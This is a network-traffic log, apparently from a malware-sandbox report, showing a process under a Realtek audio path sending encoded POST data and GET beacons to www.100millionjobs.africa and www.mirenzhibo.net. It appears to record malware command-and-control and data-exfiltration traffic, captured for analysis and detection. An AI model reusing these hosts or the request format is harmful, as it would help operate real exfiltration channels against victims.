30	192.168.11.20	49800	136.243.64.147	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:24.776856899 CET	846	OUT	POST /cxj4/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.100millionjobs.africa Referer: http://www.100millionjobs.africa/cxj4/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6b 6e 34 50 46 39 42 4b 6b 35 43 64 42 76 66 59 35 2b 6a 64 41 2b 38 77 48 75 71 4c 6c 2b 55 75 57 72 56 41 47 64 2f 31 65 65 39 32 45 49 79 36 55 58 65 79 6f 7a 63 53 72 50 4c 42 7a 78 4e 73 79 65 34 31 7a 59 54 6f 71 77 55 38 43 44 56 36 48 62 45 76 35 45 50 4c 4c 49 4f 68 54 51 74 31 6c 75 6d 43 70 52 58 51 36 45 62 44 63 55 79 51 78 53 57 4c 6b 63 52 46 2f 33 45 36 73 39 32 48 54 2b 4a 66 45 46 50 70 56 47 6f 49 6b 70 74 48 41 6c 6b 4f 63 4a 5a 77 77 34 30 6c 66 53 50 49 6e 37 76 54 7a 4c 42 56 44 50 31 47 50 59 7a 42 69 34 7a 39 35 48 79 72 66 69 50 75 7a 30 56 51 51 52 74 78 44 71 47 4e 73 41 6f 3d Data Ascii: AuPF3v=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+UuWrVAGd/1ee92EIy6UXeyozcSrPLBzxNsye41zYToqwU8CDV6HbEv5EPLLIOhTQt1lumCpRXQ6EbDcUyQxSWLkcRF/3E6s92HT+JfEFPpVGoIkptHAlkOcJZww40lfSPIn7vTzLBVDP1GPYzBi4z95HyrfiPuz0VQQRtxDqGNsAo=
Jan 13, 2025 10:23:24.972203970 CET	493	IN	HTTP/1.1 302 Found Date: Mon, 13 Jan 2025 09:23:24 GMT Server: Apache Location: http://maximumgroup.co.za/cxj4/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.11.20	49801	136.243.64.147	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:27.495220900 CET	1289	OUT	POST /cxj4/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.100millionjobs.africa Referer: http://www.100millionjobs.africa/cxj4/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6b 6e 34 50 46 39 42 4b 6b 35 43 64 42 76 66 59 35 2b 6a 64 41 2b 38 77 48 75 71 4c 6c 2b 63 75 57 2b 4a 41 47 36 4c 31 64 65 39 32 4e 6f 79 37 55 58 65 2f 6f 7a 46 56 72 50 47 6a 7a 79 6c 73 7a 34 73 31 36 4d 48 6f 68 77 55 38 48 7a 56 37 49 37 45 32 35 46 2f 50 4c 4d 69 68 54 51 74 31 6c 76 32 43 35 7a 76 51 38 45 62 4d 4c 6b 79 63 6d 43 57 76 6b 63 49 79 2f 78 59 45 74 4d 57 48 54 59 70 66 49 54 54 70 4a 57 6f 57 6a 70 74 32 41 6c 6f 46 63 4a 55 4a 77 34 41 44 66 52 66 49 6b 64 33 46 30 2f 45 4c 41 4e 46 2b 51 59 37 31 6b 37 6a 31 7a 41 7a 58 65 52 62 52 30 68 4e 54 58 6a 31 52 55 71 65 55 2f 56 46 39 72 38 4f 54 58 63 63 35 42 33 64 4d 6f 73 6c 6b 67 51 4f 75 78 4b 5a 4f 70 51 68 57 48 51 33 61 48 64 35 44 77 32 70 48 5a 42 46 53 6a 6e 7a 71 76 35 53 37 30 30 63 58 6e 66 6a 7a 4c 5a 51 53 30 49 65 55 65 68 63 70 64 67 79 56 67 51 4c 4e 73 39 5a 58 51 77 76 30 71 73 50 43 50 4b 34 47 41 55 4b 76 33 31 51 44 6a 57 4d 2f 6c 6b 36 4e 63 49 37 [TRUNCATED] Data Ascii: AuPF3v=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+cuW+JAG6L1de92Noy7UXe/ozFVrPGjzylsz4s16MHohwU8HzV7I7E25F/PLMihTQt1lv2C5zvQ8EbMLkycmCWvkcIy/xYEtMWHTYpfITTpJWoWjpt2AloFcJUJw4ADfRfIkd3F0/ELANF+QY71k7j1zAzXeRbR0hNTXj1RUqeU/VF9r8OTXcc5B3dMoslkgQOuxKZOpQhWHQ3aHd5Dw2pHZBFSjnzqv5S700cXnfjzLZQS0IeUehcpdgyVgQLNs9ZXQwv0qsPCPK4GAUKv31QDjWM/lk6NcI7/RevUiBWtczGaPEvbPbSX2eQc46ABGMAWJgkgtSW7KEPXRTHm+NAKkbBCdnMKEiyRsf+wDeO7yh7HuhRJHFLkNdA4hkiD7ZX4kniJObGWp+m+cVe77KYRfifgirUfBcbDBfidJjQ5oUr0Y8ekzO0ZqEs1UqJEIbzZJaW6hK0iyijbol/JUZxpAcX8uskpsxfVfqmX76iUIj/xW0ESldgPaxSP9v4IJgnWgG7J31qI0WAqChAy+1XkKXesuMT1s57IlJnDQgJcw++hhOr73QFj341Zm/OAR77v3gAbLDuStad+5g6aaX5R80QZji5NFAUplbv/V+
Jan 13, 2025 10:23:27.495271921 CET	5156	OUT	Data Raw: 73 6f 4a 65 75 63 4d 48 37 32 2f 32 34 47 35 43 35 43 41 55 58 75 6a 65 70 57 7a 59 55 6f 50 42 33 74 4e 42 76 53 72 76 6d 77 74 57 6e 74 39 77 37 55 4a 72 2f 4d 71 5a 77 65 54 50 63 71 35 56 4a 51 4a 42 36 69 6b 30 63 79 66 6a 7a 6d 74 67 31 2f Data Ascii: soJeucMH72/24G5C5CAUXujepWzYUoPB3tNBvSrvmwtWnt9w7UJr/MqZweTPcq5VJQJB6ik0cyfjzmtg1/ZxUqPXy/hBnbjvJCCRIRONIENEsU9IjO0gOLfO5gNKRSI5L/OgRuRulg6/kPx7u08P9sHI9AE34sxNo/vTdbpcyYNK9z7jeddWJkS1+EEwbR4UuuoiMqNJ1MPTp4sqh0VJN7sEStmTQIJy7R31P1cEK5wu2zNj6gL
Jan 13, 2025 10:23:27.495316982 CET	1550	OUT	Data Raw: 75 64 69 56 4f 47 4c 72 33 78 59 49 56 67 45 39 65 38 65 4a 4f 66 48 67 33 6f 45 61 4a 74 51 54 43 4c 50 6e 4a 51 34 68 4f 51 4c 47 66 39 54 71 32 31 61 30 4f 37 71 76 78 62 61 51 6c 6d 54 32 79 77 48 74 38 6f 6c 59 73 65 4f 7a 33 76 75 69 6d 6f Data Ascii: udiVOGLr3xYIVgE9e8eJOfHg3oEaJtQTCLPnJQ4hOQLGf9Tq21a0O7qvxbaQlmT2ywHt8olYseOz3vuimoffTxQ62+esAX6hIAJRU/tuIHrGa2wFuwpBa1z4h8jW3If59kljQzzZpzcrkLxFCSv/QjN89C01jxS29aaveE6uRj9sdxOnZ9+x+ikIl61Tb12m/ICTjrHyCLu9VNCu5Mxr/kgXSF7zlfhc0vQHgl4vfVY/TBOe+cj
Jan 13, 2025 10:23:27.691550016 CET	493	IN	HTTP/1.1 302 Found Date: Mon, 13 Jan 2025 09:23:27 GMT Server: Apache Location: http://maximumgroup.co.za/cxj4/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.11.20	49802	136.243.64.147	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:30.211882114 CET	539	OUT	GET /cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA= HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:23:30.407274961 CET	775	IN	HTTP/1.1 302 Found Date: Mon, 13 Jan 2025 09:23:30 GMT Server: Apache Location: http://maximumgroup.co.za/cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA= Content-Length: 433 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 3f 76 31 47 64 5a 3d 76 55 4e 33 26 61 6d 70 3b 41 75 50 46 33 76 3d 67 4b 74 43 39 6d 70 4e 48 54 6b 54 72 30 30 4f 4f 72 6c 75 6c 38 43 31 51 2b 44 58 76 4e 75 6f 4d 38 45 62 58 4d 4b 4e 6a 65 59 6d 45 5a 74 63 47 61 6a 79 42 63 74 72 57 4f 36 6f 45 48 4f 6f 6f 67 46 54 6c 66 53 38 2b 44 4e 51 77 35 35 44 32 4d 66 43 71 41 68 6a 49 6a 4e 67 5a 36 6b 77 6b 48 4c 71 49 4c 79 46 56 51 6b 6b 33 66 65 34 75 43 33 45 37 44 41 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.11.20	49803	202.95.11.110	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:41.350409031 CET	805	OUT	POST /wbfy/ HTTP/1.1 Host: www.mirenzhibo.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.mirenzhibo.net Referer: http://www.mirenzhibo.net/wbfy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 79 65 34 55 33 64 79 49 63 37 79 66 2f 77 66 34 2b 4f 76 31 6a 70 79 45 70 46 4d 6b 54 38 42 6b 66 55 72 52 4c 32 53 58 51 6f 74 78 56 30 4d 49 2b 4e 79 66 4e 53 68 73 32 49 4a 35 55 62 62 4a 54 2f 2b 63 64 70 77 76 6c 31 42 4e 65 7a 58 58 55 5a 6e 38 49 38 59 49 4e 42 53 78 46 67 66 50 39 38 48 4e 4a 79 75 30 30 6e 34 58 78 45 30 63 6e 55 4e 7a 31 6d 35 65 46 4f 63 65 76 6f 68 2b 71 38 59 42 48 31 6e 54 39 74 61 58 35 6f 56 49 70 75 37 59 51 44 4c 34 6c 34 38 4f 55 46 4f 43 5a 55 61 6e 33 58 36 67 4f 77 64 39 6a 61 32 6c 50 56 49 7a 46 67 3d 3d Data Ascii: AuPF3v=ac270/Kc6bxJye4U3dyIc7yf/wf4+Ov1jpyEpFMkT8BkfUrRL2SXQotxV0MI+NyfNShs2IJ5UbbJT/+cdpwvl1BNezXXUZn8I8YINBSxFgfP98HNJyu00n4XxE0cnUNz1m5eFOcevoh+q8YBH1nT9taX5oVIpu7YQDL4l48OUFOCZUan3X6gOwd9ja2lPVIzFg==
Jan 13, 2025 10:23:41.712606907 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 13 Jan 2025 09:23:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.11.20	49804	202.95.11.110	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:44.197124958 CET	825	OUT	POST /wbfy/ HTTP/1.1 Host: www.mirenzhibo.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.mirenzhibo.net Referer: http://www.mirenzhibo.net/wbfy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 7a 2f 6f 55 77 4e 4f 49 61 62 79 65 77 51 66 34 6c 65 76 78 6a 70 2b 45 70 45 49 30 54 4b 70 6b 66 32 7a 52 4b 7a 79 58 54 6f 74 78 4e 45 4d 4e 39 39 79 45 4e 53 6c 6b 32 4a 31 35 55 62 50 4a 54 36 43 63 63 61 59 6f 6b 6c 42 54 66 44 58 56 61 35 6e 38 49 38 59 49 4e 42 58 71 46 67 48 50 39 4d 58 4e 49 51 47 31 72 58 34 59 32 45 30 63 78 6b 4d 36 31 6d 35 73 46 4d 70 4c 76 72 56 2b 71 38 49 42 47 67 62 53 7a 74 61 52 32 49 55 70 68 4e 69 4e 49 78 2f 4e 73 4b 6b 6c 62 6e 44 32 52 69 58 39 71 6c 4f 45 4e 6a 42 50 6e 71 50 4e 4e 58 4a 6f 59 6e 32 61 55 4d 6c 39 4e 53 4b 31 32 65 74 62 2f 39 51 49 4a 4d 41 3d Data Ascii: AuPF3v=ac270/Kc6bxJz/oUwNOIabyewQf4levxjp+EpEI0TKpkf2zRKzyXTotxNEMN99yENSlk2J15UbPJT6CccaYoklBTfDXVa5n8I8YINBXqFgHP9MXNIQG1rX4Y2E0cxkM61m5sFMpLvrV+q8IBGgbSztaR2IUphNiNIx/NsKklbnD2RiX9qlOENjBPnqPNNXJoYn2aUMl9NSK12etb/9QIJMA=
Jan 13, 2025 10:23:44.564910889 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 13 Jan 2025 09:23:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.11.20	49805	202.95.11.110	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:47.036243916 CET	3867	OUT	POST /wbfy/ HTTP/1.1 Host: www.mirenzhibo.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.mirenzhibo.net Referer: http://www.mirenzhibo.net/wbfy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 7a 2f 6f 55 77 4e 4f 49 61 62 79 65 77 51 66 34 6c 65 76 78 6a 70 2b 45 70 45 49 30 54 4b 52 6b 65 46 37 52 4b 53 79 58 53 6f 74 78 54 30 4d 4d 39 39 7a 65 4e 57 42 67 32 4a 34 4d 55 59 33 4a 63 38 32 63 56 4c 59 6f 39 56 42 54 61 7a 58 59 55 5a 6e 6c 49 38 49 4d 4e 42 6e 71 46 67 48 50 39 4b 72 4e 49 43 75 31 74 58 34 58 78 45 30 71 6e 55 4e 66 31 6c 4a 57 46 4d 73 77 75 59 4e 2b 71 63 34 42 46 53 7a 53 37 74 61 54 36 6f 55 4c 68 4e 66 64 49 78 7a 72 73 4c 51 44 62 67 66 32 53 45 4b 5a 2f 6d 4b 37 55 54 46 2f 34 75 79 32 45 55 4e 6d 57 46 69 4e 64 38 45 58 43 55 69 69 32 4e 64 4b 72 4e 51 73 66 38 6b 48 73 6e 6b 6d 52 38 6a 76 59 68 4f 58 30 55 31 54 78 68 64 4c 47 6a 33 66 4f 7a 4c 7a 38 77 39 36 34 45 6e 37 4e 48 30 45 37 6f 73 72 77 68 46 53 35 4e 63 66 64 45 47 75 42 48 63 6f 50 52 69 42 6d 52 52 4e 52 6d 77 6b 34 66 4d 64 34 66 4e 79 57 56 62 63 70 69 2f 49 64 4f 4c 2f 43 54 39 77 75 39 30 37 2f 47 38 71 75 49 63 52 64 35 54 48 51 67 58 [TRUNCATED] Data Ascii: AuPF3v=ac270/Kc6bxJz/oUwNOIabyewQf4levxjp+EpEI0TKRkeF7RKSyXSotxT0MM99zeNWBg2J4MUY3Jc82cVLYo9VBTazXYUZnlI8IMNBnqFgHP9KrNICu1tX4XxE0qnUNf1lJWFMswuYN+qc4BFSzS7taT6oULhNfdIxzrsLQDbgf2SEKZ/mK7UTF/4uy2EUNmWFiNd8EXCUii2NdKrNQsf8kHsnkmR8jvYhOX0U1TxhdLGj3fOzLz8w964En7NH0E7osrwhFS5NcfdEGuBHcoPRiBmRRNRmwk4fMd4fNyWVbcpi/IdOL/CT9wu907/G8quIcRd5THQgXkfWe/BKw/4DrnNVAFQjPBMg/BxlF/1tBjhCATDrFVhHlGUvzX2Hh/TK0lO29ZQnYpasNSklT48O7mO+ALnzgrrubAguw30yUgsnEPVcLPAEscIkXOyYEQZXiSwd3hUEOZ6tcXsXn0gKyw5D58LyjNxvqMtUD8rCNkAk6DNYr5nfi2h7Iy6A6baKanBxmAml6cljW5R0mpdma+pNbIXgk9+5JXqUeG4nc9cewTpxf+p+07ocQC6VY+zrqeP/ZklU5pJliXegmvpoo3wzlbJ18QDldaQujDlzY0lLDzcQeRYBcJ1g1tTZUIPxt7XUhDhatp8RgQpmNGhTebF98duJbujpnih1X2+FhbDMYDLvIAdDKbtzNEyqNEYlGOfN2MQyJvTqVXk3q7e3qFDim0F4uqavJf6EvhAH0Qmipb9N+crMDGuMewOWpjVmNaxExDRO+6uZvCFx54vcymK7+WbbuEM8icpoM9DTrwpUbLiX+GMVbQao/w6IMQIHvyM3Zhe9AOexoTDdSioXIhra4KwyGkMSTPFS1PPpxMfFp1k/0s9QsThh4wkQuHZQUQjE9ADtNGQSIEmyKYkZ6d+fLaPupyXh0vS2i74iSX28gpoWxXypXqkhdbURuEgzAaOStPYCNYp39kLCMgiYT6orwNqGQQS1og8u4xGVTu1 [TRUNCATED]
Jan 13, 2025 10:23:47.036298037 CET	4107	OUT	Data Raw: 6e 54 66 6a 77 41 59 39 37 65 41 76 39 34 31 48 31 36 50 49 34 71 69 73 78 37 2f 6b 42 30 75 52 46 52 4e 4f 50 31 4f 62 76 71 75 79 49 49 2f 4a 34 75 38 50 46 44 78 46 31 5a 75 6c 6a 58 42 7a 77 70 76 4d 61 47 67 69 78 33 7a 30 4a 51 73 4e 78 46 Data Ascii: nTfjwAY97eAv941H16PI4qisx7/kB0uRFRNOP1ObvquyII/J4u8PFDxF1ZuljXBzwpvMaGgix3z0JQsNxFzehTS0BQtj2zg7aS0xsf4lfcXJmFVM3+iv1L2PbIAD7gQJ19b9ho+s0TjZwcjg7m0UCtpuhnMKleUNbLLTcyn7s7GRvPqjeeu5K4gNJnA6vXOhMDCejZ8TLLHarYljTQodD2BX0vN8iyGvSTrr6RcSHP2WMJCw4um
Jan 13, 2025 10:23:47.406032085 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 13 Jan 2025 09:23:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.11.20	49806	202.95.11.110	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:49.875637054 CET	532	OUT	GET /wbfy/?AuPF3v=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&v1GdZ=vUN3 HTTP/1.1 Host: www.mirenzhibo.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:23:50.594367981 CET	995	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 09:23:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 33 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 42 61 69 64 75 73 70 69 64 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 [TRUNCATED] Data Ascii: 322<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="Baiduspider" content="noindex, nofollow"><title></title> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><body style="padding: 0;margin: 0;"><div><script rel="nofollow" 